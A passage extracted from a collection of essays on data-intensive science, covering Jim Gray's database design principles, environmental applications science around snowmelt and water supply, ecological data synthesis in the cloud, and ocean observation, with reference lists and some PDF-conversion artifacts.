queries. 5. Go from working to working. It is important to realize that the analysis of observational datasets is severely limited by the relatively low I/O performance of most of todays computing platforms. High-performance numerical simulations are also increasingly feeling the I/O bottleneck. Once datasets exceed the random access memory (RAM) capacity of the system, locality in a multi-tiered cache no longer helps [4]. Yet very few high-end platforms provide a fast enough I/O subsystem. High-performance, scalable numerical computation also presents an algorithmic challenge. Traditional numerical analysis packages have been designed to operate on datasets that fit in RAM. To tackle analyses that are orders of magnitude larger, these packages must be redesigned to work in a multi-phase, divide-and-conquer manner while maintaining their numerical accuracy. This suggests an approach in which a large-scale problem is decomposed into smaller pieces that can be solved in RAM, whereas the rest of the dataset resides on disk. This approach is analogous to the way in which database algorithms such as sorts or joins work on datasets larger than RAM. These challenges are reaching a critical stage. Buying larger network storage systems and attaching them to clusters of compute nodes will not solve the problem because network/interconnect speeds are not growing fast enough to cope with the yearly doubling of the necessary storage. Scale-out solutions advocate simple building blocks in which the data is partitioned among nodes with locally attached storage [5]. The smaller and simpler these blocks are, the better the balance between CPUs, disks, and networking can become. Gray envisaged simple CyberBricks where each disk drive has its own CPU and networking [6]. While the number of nodes on such a system would be much larger than in a traditional scale-up architecture, the simplicity and lower cost of each node and the aggregate performance would more than make up for the added complexity. With the emergence of solid-state disks and low-power motherboards, we are on the verge of being able to build such systems [7]. Database-centric Computing Most scientific data analyses are performed in hierarchical steps. During the first pass, a subset of the data is extracted by either filtering on certain attributes (e.g., removing erroneous data) or extracting a vertical subset of the columns. In the next step, data are usually transformed or aggregated in some way. Of course, in more complex datasets, these patterns are often accompanied by complex joins among multiple datasets, such as external calibrations or extracting and analyzing different parts of a gene sequence [8]. As datasets grow ever larger, the most efficient way to perform most of these computations is clearly to move the analysis functions as close to the data as possible. It also turns out that most of these patterns are easily expressed by a set-oriented, declarative language whose execution can benefit enormously from cost-based query optimization, automatic parallelism, and indexes. Gray and his collaborators have shown on several projects that existing relational database technologies can be successfully applied in this context [9]. There are also seamless ways to integrate complex class libraries written in procedural languages as an extension of the underlying database engine [10, 11]. MapReduce has become a popular distributed data analysis and computing paradigm in recent years [12]. The principles behind this paradigm resemble the distributed grouping and aggregation capabilities that have existed in parallel relational database systems for some time. New-generation parallel database systems such as Teradata, Aster Data, and Vertica have rebranded these capabilities as MapReduce in the database. New benchmarks comparing the merits of each approach have been developed [13]. Connecting to the Scientists One of the most challenging problems in designing scientific databases is to establish effective communication between the builder of the database and the domain scientists interested in the analysis. Most projects make the mistake of trying to be everything for everyone. It is clear that that some features are more important than others and that various design trade-offs are necessary, resulting in performance trade-offs. Jim Gray came up with the heuristic rule of 20 queries. On each project he was involved with, he asked for the 20 most important questions the researchers wanted the data system to answer. He said that five questions are not enough to see a broader pattern, and a hundred questions would result in a shortage of focus. Since [14]. The 20 queries rule is a moniker for a design step that engages the domain scientist and the database engineer in a conversation that helps bridge the semantic gap between nouns and verbs used in the scientific domain and the entities and relationships stored in the database. Queries define the precise set of questions in terms of entities and relationships that domain scientists expect to pose to the database. At the end of a full iteration of this exercise, the domain scientist and the database speak a common language. This approach has been very successful in keeping the design process focused on the most important features the system must support, while at the same time helping the domain scientists understand the database system trade-offs, thereby limiting feature creep. Another design law is to move from working version to working version. Gray was very much aware of how quickly data-driven computing architecture changes, especially if it involves distributed data. New distributed computing paradigms come and go every other year, making it extremely difficult to engage in a multi-year top-down design and implementation cycle. By the time such a project is completed, the starting premises have become obsolete. If we build a system that starts working only if every one of its components functions correctly, we will never finish. The only way to survive and make progress in such a world is to build modular systems in which individual components can be replaced as the underlying technologies evolve. Todays service-oriented architectures are good examples of this. Web services have already gone through several major evolutionary stages, and the end is nowhere in sight. From Terascale to Petascale Scientific Databases By using Microsoft SQL Server, we have successfully tackled several projects on a scale from a few terabytes (TB) to tens of terabytes [15-17]. Implementing databases that will soon exceed 100 TB also looks rather straightforward [18], but it is not entirely clear how science will cross the petascale barrier. As databases become larger and larger, they will inevitably start using an increasingly scaledout architecture. Data will be heavily partitioned, making distributed, non-local queries and distributed joins increasingly difficult. For most of the petascale problems today, a simple data-crawling strategy over massively scaled-out, share-nothing data partitions has been adequate (MapReduce, Hadoop, etc.). But it is also clear that this layout is very suboptimal when a good index might provide better performance by orders of magnitude. Joins between tables of very different cardinalities have been notoriously difficult to use with these crawlers. Databases have many things to offer in terms of more efficient plans. We also need to rethink the utility of expecting a monolithic result set. One can imagine crawlers over heavily partitioned databases implementing a construct that can provide results one bucket at a time, resulting in easier checkpointing and recovery in the middle of an extensive query. This approach is also useful for aggregate functions with a clause that would stop when the result is estimated to be within, for example, 99% accuracy. These simple enhancements would go a long way toward sidestepping huge monolithic queriesbreaking them up into smaller, more manageable ones. Cloud computing is another recently emerging paradigm. It offers obvious advantages, such as co-locating data with computations and an economy of scale in hosting the services. While these platforms obviously perform very well for their current intended use in search engines or elastic hosting of commercial Web sites, their role in scientific computing is yet to be clarified. In some scientific analysis scenarios, the data needs to be close to the experiment. In other cases, the nodes need to be tightly integrated with a very low latency. In yet other cases, very high I/O bandwidth is required. Each of these analysis strategies would be suboptimal in current virtualization environments. Certainly, more specialized data clouds are bound to emerge soon. In the next few years, we will see if scientific computing moves from universities to commercial service providers or whether it is necessary for the largest scientific data stores to be aggregated into one. Conclusions Experimental science is generating vast volumes of data. The Pan-STARRS project will capture 2.5 petabytes (PB) of data each year when in production [18]. The Large Hadron Collider will generate 50 to 100 PB of data each year, with about 20 PB of that data stored and processed on a worldwide federation of national grids linking 100,000 CPUs [19]. Yet generic data-centric solutions to cope with this volume of data and corresponding analyses are not readily available [20]. Scientists and scientific institutions need a template and collection of best practices that lead to balanced hardware architectures and corresponding software to deal with these volumes of data. This would reduce the need to reinvent the wheel. Database features such as declarative, set-oriented languages and automatic parallelism, which have been successful in building large-scale scientific applications, are clearly needed. We believe that the current wave of databases can manage at least another order of magnitude in scale. So for the time being, we can continue to work. However, it is time to start thinking about the next wave. Scientific databases are an early predictor of requirements that will be needed by conventional corporate applications; therefore, investments in these applications will lead to technologies that will be broadly applicable in a few years. Todays science challenges are good representatives of the data management challenges for the 21st century. Grays Laws represent an excellent set of guiding principles for designing the data-intensive systems of the future. References [1] A. S. Szalay and J. Gray, Science in an Exponential World, Nature, vol. 440, pp. 2324, 2006, doi: 10.1038/440413a. [2] J. Becla and D. Wang, Lessons Learned from Managing a Petabyte, CIDR 2005 Conference, Asilomar, 2005, doi: 10.2172/839755. [3] G. Bell, J. Gray, and A. Szalay, Petascale Computational Systems: Balanced CyberInfrastructure in a Data-Centric World, IEEE Computer, vol. 39, pp. 110112, 2006, doi: 10.1109/MC.2006.29. [4] W. W. Hsu and A. J. Smith, Characteristics of I/O traffic in personal computer and server workloads, IBM Sys. J., vol. 42, pp. 347358, 2003, doi: 10.1147/sj.422.0347. [5] A. Szalay, G. Bell, et al., GrayWulf: Scalable Clustered Architecture for Data Intensive Computing, Proc. HICSS-42 Conference, Hawaii, 2009, doi: 10.1109/HICSS.2009.750. [6] J. Gray, Cyberbricks Talk at DEC/NT Wizards Conference, 2004; T. Barclay, W. Chong, and J. Gray, TerraServer Bricks A High Availability Cluster Alternative, Microsoft Technical Report, MSR-TR-2004-107, Cyberbrick.ppt. [7] A. S. Szalay, G. Bell, A. Terzis, A. S. White, and J. Vandenberg, Low Power Amdahl Blades for Data-Intensive Computing,. pdf. [8] U. Roehm and J. A. Blakeley, Data Management for High-Throughput Genomics, Proc. CIDR, 2009. [9] J. Gray, D. T. Liu, M. A. Nieto-Santisteban, A. S. Szalay, G. Heber, and D. DeWitt, Scientific Data Management in the Coming Decade, ACM SIGMOD Record, vol. 34, no. 4, pp. 3541, 2005; also MSR-TR-2005-10, doi: 10.1145/1107499.1107503. [10] A. Acheson et al., Hosting the .NET Runtime in Microsoft SQL Server, ACM SIGMOD Conf., 2004, doi: 10.1145/1007568.1007669. [11] J. A. Blakeley, M. Henaire, C. Kleinerman, I. Kunen, A. Prout, B. Richards, and V. Rao, .NET Database Programmability and Extensibility in Microsoft SQL Server, ACM SIGMOD Conf., 2008, doi: 10.1145/1376616.1376725. [12] J. Dean and S. Ghemawat, MapReduce: Simplified Data Processing on Large Clusters, OSDI, 2004, doi: 10.1145/1327452.1327492. [13] A. Pavlo et al., A Comparison of Approaches to Large-Scale Data Analysis, ACM SIGMOD Conf., 2009, doi: 10.1145/1559845.1559865. [14] C. Anderson. The Long Tail. New York: Random House, 2007. [15] A. R. Thakar, A. S. Szalay, P. Z. Kunszt, and J. Gray, The Sloan Digital Sky Survey Science Archive: Migrating a Multi-Terabyte Astronomical Archive from Object to Relational DBMS, Comp. Sci. and Eng., vol. 5, no. 5, pp. 1629, Sept. 2003. 10 [16] A. Terzis, R. Musaloiu-E., J. Cogan, K. Szlavecz, A. Szalay, J. Gray, S. Ozer, M. Liang, J. Gupchup, and R. Burns, Wireless Sensor Networks for Soil Science, Int. J. Sensor Networks, to be published 2009. [17] Y. Li, E. Perlman, M. Wan, Y. Yang, C. Meneveau, R. Burns, S. Chen, A. Szalay, and G. Eyink, A public turbulence database cluster and applications to study Lagrangian evolution of velocity increments in turbulence, J. Turbul., vol. 9, no. 31, pp. 129, 2008, doi: 10.1080/14685240802376389. [18] Pan-STARRS: Panoramic Survey Telescope and Rapid Response System,. [19] A. M. Parker, Understanding the Universe, in Towards 2020 Science, Microsoft Corporation, 2006,. [20] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 12971298, 2009, doi: 10.1126/science.1170411. 11 E A RT H A N D E N V I R O N M E N T has matured through two major phases and is entering a third. In the first phase, which ended two decades ago, Earth and environmental science was largely discipline oriented and focused on developing knowledge in geology, atmospheric chemistry, ecosystems, and other aspects of the Earth system. In the 1980s, the scientific community recognized the close coupling of these disciplines and began to study them as interacting elements of a single system. During this second phase, the paradigm of Earth system science emerged. With it came the ability to understand complex, system-oriented phenomena such as climate change, which links concepts from atmospheric sciences, biology, and human behavior. Essential to the study of Earths interacting systems was the ability to acquire, manage, and make available data from satellite observations; in parallel, new models were developed to express our growing understanding of the complex processes in the dynamic Earth system [1]. In the emerging third phase, knowledge developed primarily for the purpose of scientific understanding is being complemented by knowledge created to target practical decisions and action. This new knowledge endeavor can be referred to as the science of environmental applications. Climate change provides the most prominent example of the importance of this shift. Until now, the he science of earth and environment 13 climate science community has focused on critical questions involving basic knowledge, from measuring the amount of change to determining the causes. With the basic understanding now well established, the demand for climate applications knowledge is emerging. How do we quantify and monitor total forest biomass so that carbon markets can characterize supply? What are the implications of regional shifts in water resources for demographic trends, agricultural output, and energy production? To what extent will seawalls and other adaptations to rising sea level impact coasts? These questions are informed by basic science, but they raise additional issues that can be addressed only by a new science discipline focused specifically on applicationsa discipline that integrates physical, biogeochemical, engineering, and human processes. Its principal questions reflect a fundamental curiosity about the nature of the world we live in, tempered by the awareness that a questions importance scales with its relevance to a societal imperative. As Nobel laureate and U.S. Secretary of Energy Steven Chu has remarked, We seek solutions. We dont seek dare I say this?just scientific papers anymore [2]. To illustrate the relationships between basic science and applications, consider the role of snowmelt runoff in water supplies. Worldwide, 1 billion people depend on snow or glacier melt for their water resources [3]. Design and operations of water systems have traditionally relied on historical measurements in a stationary climate, along with empirical relationships and models. As climates and land use change, populations grow and relocate, and our built systems age and decay, these empirical methods of managing our water become inaccuratea conundrum characterized as stationarity is dead [4]. Snowmelt commonly provides water for competing uses: urban and agricultural supply, hydropower, recreation, and ecosystems. In many areas, both rainfall and snowfall occur, raising the concern that a future warmer climate will lead to a greater fraction of precipitation as rain, with the water arriving months before agricultural demand peaks and with more rapid runoff leading to more floods. In these mixed rain and snow systems, the societal need is: How do we sustain flood control and the benefits that water provides to humans and ecosystems when changes in the timing and magnitude of runoff are likely to render existing infrastructure inadequate? The solution to the societal need requires a more fundamental, process-based understanding of the water cycle. Currently, historical data drive practices and decisions for flood control and water supply systems. Flood operations and reservoir flood capacity are predetermined by regulatory orders that are static, regardless 14 of the type of water year, current state of the snowpack, or risk of flood. In many years, early snowmelt is not stored because statistically based projections anticipate floods that better information might suggest cannot materialize because of the absence of snow. The more we experience warming, the more frequently this occurrence will impact the water supply [5]. The related science challenges are: (1) The statistical methods in use do not try to estimate the basins water balance, and with the current measurement networks even in the U.S., we lack adequate knowledge of the amount of snow in the basins; (2) We are unable to partition the input between rain and snow, or to partition that rain or snow between evapotranspiration and runoff; (3) We lack the knowledge to manage the relationship between snow cover, forests, and carbon stocks; (4) Runoff forecasts that are not based on physical principles relating to snowmelt are often inaccurate; and (5) We do not know what incentives and institutional arrangements would lead to better management of the watershed for ecosystem services. Generally, models do not consider these kinds of interactions; hence the need for a science of environmental applications. Its core characteristics differentiate it from the basic science of Earth and environment: Need driven versus curiosity driven. Basic science is question driven; in contrast, the new applications science is guided more by societal needs than scientific curiosity. Rather than seeking answers to questions, it focuses on creating the ability to seek courses of action and determine their consequences. Externally constrained. External circumstances often dictate when and how applications knowledge is needed. The creation of carbon trading markets will not wait until we fully quantify forest carbon content. It will happen on a schedule dictated by policy and economics. Construction and repair of the urban water infrastructure will not wait for an understanding of evolving rainfall patterns. Applications science must be prepared to inform actions subject to these external drivers, not according to academic schedules based on when and how the best knowledge can be obtained. Consequential and recursive. Actions arising from our knowledge of the Earth often change the Earth, creating the need for new knowledge about what we have changed. For example, the more we knew in the past about locations of fish populations, the more the populations were overfished; our original knowledge about them became rapidly outdated through our own actions. Applications sci- 15 ence seeks to understand not just those aspects of the Earth addressed by a particular use scenario, but also the consequences and externalities that result from that use scenario. A recent example is the shift of agricultural land to corn-forethanol productionan effort to reduce climate change that we now recognize as significantly stressing scarce water resources. Useful even when incomplete. As the snowpack example illustrates, actions are often needed despite incomplete data or partial knowledge. The difficulty of establishing confidence in the quality of our knowledge is particularly disconcerting given the loss of stationarity associated with climate change. New means of making effective use of partial knowledge must be developed, including robust inference engines and statistical interpretation. Scalable. Basic science knowledge does not always scale to support applications needs. The example of carbon trading presents an excellent illustration. Basic science tells us how to relate carbon content to measurements of vegetation type and density, but it does not give us the tools that scale this to a global inventory. New knowledge tools must be built to accurately create and update this inventory through cost-effective remote sensing or other means. Robust. The decision makers who apply applications knowledge typically have limited comprehension of how the knowledge was developed and in what situations it is applicable. To avoid misuse, the knowledge must be characterized in highly robust terms. It must be stable over time and insensitive to individual interpretations, changing context, and special conditions. Data intensive. Basic science is data intensive in its own right, but data sources that support basic science are often insufficient to support applications. Localized impacts with global extent, such as intrusion of invasive species, are often difficult for centralized projects with small numbers of researchers to ascertain. New applications-appropriate sources must be identified, and new ways of observing (including the use of communities as data gatherers) must be developed. Each of these characteristics implies development of new knowledge types and new tools for acquiring that knowledge. The snowpack example illustrates what this requirement means for a specific application area. Four elements have recently come together that make deployment of a measurement and information system 16 that can support decisions at a scale of a large river basin feasible: (1) accurate, sustained satellite estimates of snow-covered area across an entire mountain range; (2) reliable, low-cost sensors and telemetry systems for snow and soil moisture; (3) social science data that complement natural and engineered systems data to enable analysis of human decision making; and (4) cyberinfrastructure advances to integrate data and deliver them in near real time. For snow-dominated drainage basins, the highest-priority scientific challenge is to estimate the spatial distribution and heterogeneity of the snow water equivalent i.e., the amount of water that would result if the snow were to melt. Because of wind redistribution of snow after it falls, snow on the ground is far more heterogeneous than rainfall, with several meters of differences within a 10 to 100 m distance. Heterogeneity in snow depth smoothes the daily runoff because of the variability of the duration of meltwater in the snowpack [6]; seasonally, it produces quasi-riparian zones of increased soil moisture well into the summer. The approach to estimating the snow water equivalent involves several tasks using improved data: (1) extensive validation of the satellite estimates of snow cover and its reflectivity, as Figure 1 on the next page shows; (2) using results from an energy balance reconstruction of snow cover to improve interpolation from more extensive ground measurements and satellite data [7]; (3) development of innovative ways to characterize heterogeneity [8]; and (4) testing the interpolated estimates with a spatially distributed runoff model [9]. The measurements would also help clarify the accuracy in precipitation estimates from regional climate models. This third phase of Earth and environmental science will evolve over the next decade as the scientific community begins to pursue it. Weather science has already built substantial capability in applications science; the larger field of Earth science will need to learn from and extend those efforts. The need for basic science and further discovery will not diminish, but instead will be augmented and extended by this new phase. The questions to address are both practically important and intellectually captivating. Will our hydrologic forecasting skill decline as changes in precipitation diminish the value of statistics obtained from historic patterns? Where will the next big climate change issue arise, and what policy actions taken today could allow us to anticipate it? Equally important is improving how we apply this knowledge in our daily lives. The Internet and mobile telephones, with their global reach, provide new ways to disseminate information rapidly and widely. Information was available to avoid much of the devastation from the Asian tsunami and Hurricane Katrina, but we 17 122W 120W 118W 122W 120W 118W 122W 120W 118W FIGURE 1. An illustration of the type of data that are useful in analyzing the snow cover. The left panel shows elevations of the Sierra Nevada and Central Valley of California, along with a portion of northwestern Nevada. The middle panel shows the raw satellite data in three spectral bands (0.8410.876, 0.5450.565, and 0.4590.479m) from NASAs Moderate Resolution Imaging Spectroradiometer (MODIS), which provides daily global data at 250 to 1000 m resolution in 36 spectral bands. From seven land bands at 500 m resolution, we derive the fractional snow-covered areai.e., the fraction of each 500 m grid cell covered by snow, shown in the right panel [10]. lacked the tools for rapid decision making and communication of needed actions. Applications science is therefore integrative; it couples understanding of physical phenomena and research into the ways that people and organizations can use better knowledge to make decisions. The public as a whole can also become an important contributor to localized Earth observation, augmenting our limited satellite and sensor networks through devices as simple as mobile phone cameras. The ability to leverage this emerging data-gathering capability will be an important challenge for the new phase of environmental science. The security and prosperity of nearly 7 billion people depend increasingly on our ability to gather and apply information about the world around us. Basic environ- 18 mental science has established an excellent starting point. We must now develop this into a robust science of environmental applications. References [1] National Research Council, Earth Observations from Space: The First 50 Years of Scientific Achievement. Washington, D.C.: National Academies Press, 2007. [2] R. DelVecchio, UC Berkeley: Panel looks at control of emissions, S.F. Chronicle, March 22, 2007. [3] T. P. Barnett, J. C. Adam, and D. P. Lettenmaier, Potential impacts of a warming climate on water availability in snow-dominated regions, Nature, vol. 438, pp. 303309, 2005, doi: 10.1038/ nature04141. [4] P. C. D. Milly, J. Betancourt, M. Falkenmark, R. M. Hirsch, Z. W. Kundzewicz, D. P. Lettenmaier, and R. J. Stouffer, Stationarity is dead: whither water management? Science, vol. 319, pp. 573574, 2008, doi: 10.1126/science.1151915. [5] R. C. Bales, N. P. Molotch, T. H. Painter, M. D. Dettinger, R. Rice, and J. Dozier, Mountain hydrology of the western United States, Water Resour. Res., vol. 42, W08432, 2006, doi: 10.1029/2005WR004387. [6] J. D. Lundquist and M. D. Dettinger, How snowpack heterogeneity affects diurnal streamflow timing, Water Resour. Res., vol. 41, W05007, 2005, doi: 10.1029/2004WR003649. [7] D. W. Cline, R. C. Bales, and J. Dozier, Estimating the spatial distribution of snow in mountain basins using remote sensing and energy balance modeling, Water Resour. Res., vol. 34, pp. 12751285, 1998, doi: 10.1029/97WR03755. [8] N. P. Molotch and R. C. Bales, Scaling snow observations from the point to the grid element: implications for observation network design, Water Resour. Res., vol. 41, W11421, 2005, doi: 10.1029/2005WR004229. [9] C. L. Tague and L. E. Band, RHESSys: regional hydro-ecologic simulation systeman objectoriented approach to spatially distributed modeling of carbon, water, and nutrient cycling, Earth Int., vol. 19, pp. 142, 2004. [10] T. H. Painter, K. Rittger, C. McKenzie, R. E. Davis, and J. Dozier, Retrieval of subpixel snowcovered area, grain size, and albedo from MODIS, Remote Sens. Environ., vol. 113, pp. 868879, 2009, doi: 10.1016/j.rse.2009.01.001. 19 E A RT H A N D E N V I R O N M E N T James R . H u nt University of California, Berkeley, and the Berkeley Water Center Dennis D. BaldocChi University of California, Berkeley Catharine van Ingen Microsoft Research and its interactions with the physical environment. Because climate change requires rapid adaptation, new data analysis tools are essential to quantify those changes in the midst of high natural variability. Ecology is a science in which studies have been performed primarily by small groups of individuals, with data recorded and stored in notebooks. But large synthesis studies are now being attempted by collaborations involving hundreds of scientists. These larger efforts are essential because of two developments: one in how science is done and the other in the resource management questions being asked. While collaboration synthesis studies are still nascent, their ever-increasing importance is clear. Computational support is integral to these collaborations and key to the scientific process. cology is the study of life The global climate and the Earths landscape are changing, and scientists must quantify significant linkages between atmospheric, oceanic, and terrestrial processes to properly study the phenomena. For example, scientists are now asking how climate fluctuations in temperature, precipitation, solar radiation, length of growing season, and extreme weather events such as droughts affect the net carbon exchange between vegetation and the atmo- 21 sphere. This question spans many Earth science disciplines with their respective data, models, and assumptions. These changes require a new approach to resolving resource management questions. In the short run of the next few decades, ecosystems cannot be restored to their former status. For example, with a warming climate on the West Coast of the United States, can historical data from coastal watersheds in southern California be used to predict the fish habitats of northern California coastal watersheds? Similarly, what can remote sensing tell us about deforestation? Addressing these challenges requires a synthesis of data and models that spans length scales from the very local (river pools) to the global (oceanic circulations) and spans time scales from a few tens of milliseconds to centuries. An Example of Ecological Synthesis Figure 1 shows a simple science mashup example of a synthesis study. The graph compares annual runoff from relatively small watersheds in the foothills of the Sierra Nevada in California to local annual precipitation over multiple years. Annual runoff values were obtained from the U.S. Geological Survey (USGS) for three of the gauging stations along Dry Creek and the Schubert University of California experimental field site.1 Long-term precipitation records from nearby rain gauges were obtained from the National Climatic Data Center.2 The precipitation that does not run off undergoes evapotranspiration (ET) that is largely dominated by watershed vegetation. In these watersheds, a single value of 400 mm is observed over all years of data. A similar value of annual ET was obtained by independent 1 2 500 I n M i l l i m et ers 400 Annual Runoff 300 200 AC PL ER D OL H E 100 200 400 600 800 1000 Annual Precipitation Schubert (1.03 sq. km.) Dry Creek (181 sq. km.) Dry Creek (689 sq. km.) Dry Creek (829 sq. km.) FIGURE 1. Simple annual water balance to estimate evapotranspiration in Sierra Nevada foothill watersheds. The dashed line represents an annual ET of 400 mm. 22 measurement from atmospheric sensors deployed over an oak savannah ecosystem at the AmeriFlux Tonzi Ranch tower.3 This synthesis of historical data defines a watershed model appropriate for historical conditions and provides a reference frame for addressing climate change effects in a highly variable system. The Coming Flood of Ecological Data These new synthesis studies are enabled by the confluence of low-cost sensors, remote sensing, Internet connectivity, and commodity computing. Sensor deployments by research groups are shifting from short campaigns to long-term monitoring with finer-scale and more diverse instruments. Satellites give global coverage particularly to remote or harsh regions where field research is hampered by physical and political logistics. Internet connectivity is enabling data sharing across organizations and disciplines. The result of these first three factors is a data flood. Commodity computing provides part of the solution, by allowing for the flood to be paired with models that incorporate different physical and biological processes and allowing for different models to be linked to span the length and time scales of interest. The flood of ecological data and ecological science synthesis presents unique computing infrastructure challenges and new opportunities. Unlike sciences such as physics or astronomy, in which detectors are shared, in ecological science data are generated by a wide variety of groups using a wide variety of sampling or simulation methodologies and data standards. As shown earlier in Figure 1, the use of published data from two different sources was essential to obtain evapotranspiration. This synthesis required digital access to long records, separate processing of those datasets to arrive at ET, and finally verification with independent flux tower measurements. Other synthetic activities will require access to evolving resources from government organizations such as NASA or USGS, science collaborations such as the National Ecological Observatory Network and the WATERS Network,4 individual university science research groups such as Life Under Your Feet,5 and even citizen scientist groups such as the Community Collaborative Rain, Hail and Snow Network6 and the USA National Phenology Network.7 While the bulk of the data start out as digital, originating from the field sensor, 3 23 radar, or satellite, the historic data and field data, which are critical for the science, are being digitized. The latter data are not always evenly spaced time series; they can include the date of leaf budding, or aerial imagery at different wavelengths and resolutions to assess quantities throughout the watershed such as soil moisture, vegetation, and land use. Deriving science variables from remote sensing remains an active area of research; as such, hard-won field measurements often form the ground truth necessary to develop conversion algorithms. Citizen science field observations such as plant species, plant growth (budding dates or tree ring growth, for example), and fish and bird counts are becoming increasingly important. Integrating such diverse information is an ever-increasing challenge to science analysis. Navigating the Ecological Data Flood The first step in any ecological science analysis is data discovery and harmonization. Larger datasets are discoverable today; smaller and historic datasets are often found by word of mouth. Because of the diversity of data publishers, no single reporting protocol exists. Unit conversions, geospatial reprojections, and time/length scale regularizations are a way of life. Science data catalog portals such as SciScope8 and Web services with common data models such as those from the Open Geospatial Consortium9 are evolving. Integral to these science data search portals is knowledge of geospatial features and variable namespace mediation. The first enables searches across study watersheds or geological regions as well as simple polygon bounding boxes. The second enables searches to include multiple search termssuch as rainfall, precipitation, and precipwhen searching across data repositories with different naming conventions. A new generation of metadata registries that use semantic Web technologies will enable richer searches as well as automated name and unit conversions. The combination of both developments will enable science data searches such as Find me the daily river flow and suspended sediment discharge data from all watersheds in Washington State with more than 30 inches of annual rainfall. Moving Ecological Synthesis into the Cloud Large synthesis datasets are also leading to a migration from the desktop to cloud computing. Most ecological science datasets have been collections of files. An example is the Fluxnet LaThuile synthesis dataset, containing 966 site-years of sensor 8 9 24 data from 253 sites around the world. The data for each site-year is published as a simple comma-separated or MATLAB-ready file of either daily aggregates or halfhourly aggregates. Most of the scientists download some or all of the files and then perform analyses locally. Other scientists are using an alternative cloud service that links MATLAB on the desktop to a SQL Server Analysis Services data cube in the cloud. The data appears local, but the scientists need not be bothered with the individual file handling. Local download and manipulation of the remote sensing data that would complement that sensor data are not practical for many scientists. A cloud analysis now in progress using both to compute changes in evapotranspiration across the United States over the last 10 years will download 3 terabytes of imagery and use 4,000 CPU hours of processing to generate less than 100 MB of results. Doing the analysis off the desktop leverages the higher bandwidth, large temporary storage capacity, and compute farm available in the cloud. Synthesis studies also create a need for collaborative tools in the cloud. Science data has value for data-owner scientists in the form of publications, grants, reputation, and students. Sharing data with others should increase rather than decrease that value. Determining the appropriate citations, acknowledgment, and/or coauthorship policies for synthesis papers remains an open area of discussion in larger collaborations such as Fluxnet10 and the North American Carbon Program.11 Journal space and authorship limitations are an important concern in these discussions. Addressing the ethical question of what it means to be a co-author is essential: Is contributing data sufficient when that contribution is based on significant intellectual and physical effort? Once such policies are agreed upon, simple collaborative tools in the cloud can greatly reduce the logistics required to publish a paper, provide a location for the discovery of collaboration authors, and enable researchers to track how their data are used. How Cyberinfrastructure Is Changing Ecological Science The flood of ecological data will break down scientific silos and enable a new generation of scientific research. The goal of understanding the impacts of climate change is driving research that spans disciplines such as plant physiology, soil science, meteorology, oceanography, hydrology, and fluvial geomorphology. Bridging the diverse length and time scales involved will require a collection of cooperating models. Synthesizing the field observations with those model results at key length 10 11 25 and time scales is crucial to the development and validation of such models. The diversity of ecological dataset size, dataset semantics, and dataset publisher concerns poses a cyberinfrastructure challenge that will be addressed over the next several years. Synthesis science drives not only direct conversations but also virtual ones between scientists of different backgrounds. Advances in metadata representation can break down the semantic and syntactic barriers to those conversations. Data visualizations that range from our simple mashup to more complex virtual worlds are also key elements in those conversations. Cloud access to discoverable, distributed datasets and, perhaps even more important, enabling cloud data analyses near the more massive datasets will enable a new generation of cross-discipline science. 26 E A RT H A AN ND ENVIRONMENT he global ocean 27 to all of us by virtue of their mobile nature. The oceans may be viewed as the common heritage of humankind, the responsibility and life support of us all. Ocean Complexity Our challenge is to optimize the benefits and mitigate the risks of living on a planet dominated by two major energy sources: sunlight driving the atmosphere and much of the upper ocean, and internal heat driving plate tectonics and portions of the lower ocean. For more than 4 billion years, the global ocean has responded to and integrated the impacts of these two powerful driving forces as the Earth, the oceans, the atmosphere, and life have co-evolved. As a consequence, our oceans have had a long, complicated history, producing todays immensely complex system in which thousands of physical, chemical, and biological processes continually interact over many scales of time and space as the oceans maintain our planetaryscale ecological comfort zone. Figure 1 captures a small fraction of this complexity, which is constantly driven by energy from above and below. Deeper understanding of this global life-support system requires entirely novel research approaches that will allow broad spectrum, interactive ocean processes to be studied simultaneously and interactively by many scientistsapproaches that enable continuous in situ examination of linkages among many processes in a coherent time and space framework. Implementing these powerful new approaches is both the challenge and the vision of next-generation ocean science. Historical Perspective For thousands of years, humans have gone to sea in ships to escape, to conquer, to trade, and to explore. Between October 1957 and January 1960, we launched the first Earth-orbiting satellite and dove to the deepest part of the ocean. Ships, satellites, and submarines have been the mainstays of spatially focused oceanographic research and exploration for the past 50 years. We are now poised on the next threshold of technological breakthrough that will advance oceanic discovery; this time, exploration will be focused on the time domain and interacting processes. This new era will draw deeply on the emergence, and convergence, of many rapidly evolving new technologies. These changes are setting the scene for what Marcel Proust called [t]he real voyage of discovery, [which] lies not in seeking new landscapes, but in having new eyes. In many ways, this vision of next-generation oceanographic research and 28 FIGURE 1. Two primary energy sources powerfully influence the ocean basins: sunlight and its radiant energy, and internal heat with its convective and conductive input. Understanding the complexity of the oceans requires documenting and quantifyingin a well-defined time-space framework over decadesmyriad processes that are constantly changing and interacting with one another. Illustration designed by John Delaney and Mark Stoermer; created by the Center for Environmental Visualization (CEV) for the NEPTUNE Program. 29 education involves utilizing a wide range of innovative technologies to simultaneously and continuously see, or sense, many different processes operating throughout entire volumes of the ocean from a perspective within the ocean. Some of these same capabilities will enable remote in situ detection of critical changes taking place within selected ocean volumes. Rapid reconfiguration of key sensor arrays linked to the Internet via submarine electro-optical cables will allow us to capture, image, document, and measure energetic and previously inaccessible phenomena such as erupting volcanoes, major migration patterns, large submarine slumps, big earthquakes, giant storms, and a host of other complex phenomena that have been largely inaccessible to scientific study. The Fourth Paradigm The ocean has been chronically under-sampled for as long as humans have been trying to characterize its innate complexity. In a very real sense, the current suite of computationally intensive numerical/theoretical models of ocean behavior has outstripped the requisite level of actual data necessary to ground those models in reality. As a consequence, we have been unable to even come close to useful predictive models of the real behavior of the oceans. Only by quantifying powerful episodic events, like giant storms and erupting volcanoes, within the context of longer-term decadal changes can we begin to approach dependable predictive models of ocean behavior. Over time, as the adaptive models are progressively refined by continual comparison with actual data flowing from real systems, we slowly gain the ability to predict the future behavior of these immensely complex natural systems. To achieve that goal, we must take steps to fundamentally change the way we approach oceanography. This path has several crucial steps. We must be able to document conditions and measure fluxes within the volume of the ocean, simultaneously and in real time, over many scales of time and space, regardless of the depth, energy, mobility, or complexity of the processes involved. These measurements must be made using colocated arrays of many sensor types, operated by many investigators over periods of decades to centuries. And the data must be collected, archived, visualized, and compared immediately to model simulations that are explicitly configured to address complexity at scales comparable in time and space to the actual measurements. This approach offers three major advantages: (1) The models must progressively emulate the measured reality through constant comparison with data to capture the real behavior of the oceans in model space to move toward more predictive 30 